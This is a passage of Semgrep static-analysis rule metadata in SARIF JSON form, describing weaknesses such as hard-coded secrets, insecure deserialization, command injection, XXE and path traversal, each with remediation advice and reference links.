Rule](https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn)\n - [http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html](http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html)\n","text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"helpUri":"https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","id":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","name":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"help":{"markdown":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key","id":"generic.secrets.security.detected-private-key.detected-private-key","name":"generic.secrets.security.detected-private-key.detected-private-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-private-key.detected-private-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token","id":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","name":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.axios.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"help":{"markdown":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use)\n - [https://www.php.net/manual/en/intro.ftp.php](https://www.php.net/manual/en/intro.ftp.php)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php)\n","text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"helpUri":"https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use","id":"php.lang.security.ftp-use.ftp-use","name":"php.lang.security.ftp-use.ftp-use","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.ftp-use.ftp-use"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled)\n - [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)\n","text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","id":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","name":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask)\n - [https://docs.python.org/3/library/os.html#os.environ](https://docs.python.org/3/library/os.html#os.environ)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","id":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","name":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"help":{"markdown":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied)\n - [https://go101.org/article/concurrent-common-mistakes.html](https://go101.org/article/concurrent-common-mistakes.html)\n","text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"helpUri":"https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","id":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","name":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","id":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","name":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"help":{"markdown":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods)\n - [https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb](https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb)\n","text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","id":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","name":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","id":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","name":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"help":{"markdown":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","id":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","name":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"help":{"markdown":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n - [https://eprint.iacr.org/2016/759.pdf](https://eprint.iacr.org/2016/759.pdf)\n - [https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf](https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf)\n - [https://datatracker.ietf.org/doc/html/rfc9106#section-4](https://datatracker.ietf.org/doc/html/rfc9106#section-4)\n","text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"helpUri":"https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","id":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","name":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC777 tokensReceived() reentrancy"},"help":{"markdown":"ERC777 tokensReceived() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy)\n - [https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0](https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0)\n - [https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f](https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f)\n","text":"ERC777 tokensReceived() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy","id":"solidity.security.erc777-reentrancy.erc777-reentrancy","name":"solidity.security.erc777-reentrancy.erc777-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc777-reentrancy.erc777-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"help":{"markdown":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization)\n - [https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution](https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution)\n","text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","id":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","name":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"help":{"markdown":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md)\n - [https://owasp.org/www-community/attacks/HTTP_Response_Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)\n","text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection","id":"generic.nginx.security.header-injection.header-injection","name":"generic.nginx.security.header-injection.header-injection","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.header-injection.header-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","id":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","name":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-empty-password.node-mssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename","id":"javascript.express.express-fs-filename.express-fs-filename","name":"javascript.express.express-fs-filename.express-fs-filename","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.express-fs-filename.express-fs-filename"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe","id":"java.lang.security.xxe.validator-xxe.validator-xxe","name":"java.lang.security.xxe.validator-xxe.validator-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.validator-xxe.validator-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive 